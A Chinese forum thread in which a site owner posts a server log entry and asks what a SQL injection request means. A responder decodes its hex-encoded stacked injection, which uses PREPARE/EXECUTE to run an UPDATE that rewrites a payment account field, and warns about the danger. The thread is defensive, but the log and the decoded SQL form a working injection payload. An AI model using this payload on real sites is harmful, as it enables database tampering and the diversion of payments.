有大佬知道 这句sql注入的意思是什么吗

wuwang

日志ID(ID)：605b2669e623d0df42864b17        请求概要(Request)：GET /User/dk/id/54;set%20@vsql=0x7570646174652079736b5f65776d207365742065776d5f6163633d275457446378795838374158586d4d485a354d466e4268544c7831644e456e4d54473927207768657265206964203d203333343b;prepare%20stmt%20from%20@vsql;execute%20stmt;.html HTTP/1.1
请求URI(RequestURI)：/User/dk/id/54;set%20@vsql=0x7570646174652079736b5f65776d207365742065776d5f6163633d275457446378795838374158586d4d485a354d466e4268544c7831644e456e4d54473927207768657265206964203d203333343b;prepare%20stmt%20from%20@vsql;execute%20stmt;.html        请求方法(RequestMethod)：GET
主机地址(Host)：xx        请求来源(Referer)：http://xx/Index/shoudan.html
终端地址(RemoteAddr:RemotePort)：59.125.45.164:46526        终端信息(UserAgent)： Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
操作系统(OS)： Windows 10        浏览器(Browser)： Chrome 89
协议(Proto)：HTTP/1.1        状态(StatusMessage)：200 OK
文件类型(ContentType)：text/html; charset=utf-8        发送字节(BytesSent)：6219
ISO8601时间：2021-03-24T19:45:45.178+08:00        本地时间(TimeLocal)：24/Mar/2021:19:45:45 +0800
后端服务(Backend)： 10.0.7.4:80        Fastcgi服务： -

zponds

0x7xxx的那个是十六进制
set @vsql="update ysk_ewm set ewm_acc='TWDcxyX87AXXmMHZ5MFnBhTLx1dNEnMTG9' where id = 334;";
prepare stmt from @vsql;
execute stmt;

用的预处理
本质上只是执行了那一句sql而已 属于堆叠注入

zponds

另外 请楼主多加注意 堆叠注入是非常危险的... 不只是库会被脱而已

wuwang

zponds 发表于 2021-3-24 21:59
另外 请楼主多加注意 堆叠注入是非常危险的... 不只是库会被脱而已

大佬能解决吗

zponds

wuwang 发表于 2021-3-24 22:02
大佬能解决吗

又不是我的代码...怎么解决?
一般出现注入都不止一个地方，修复需要把其他地方都看看。

wuwang

zponds 发表于 2021-3-24 22:06
又不是我的代码...怎么解决?
一般出现注入都不止一个地方，修复需要把其他地方都看看。 ...

大佬  给个联系方式可以吗

zponds

wuwang 发表于 2021-3-24 22:07
大佬  给个联系方式可以吗

这个属于应急响应了 收费会很贵 还是自己做吧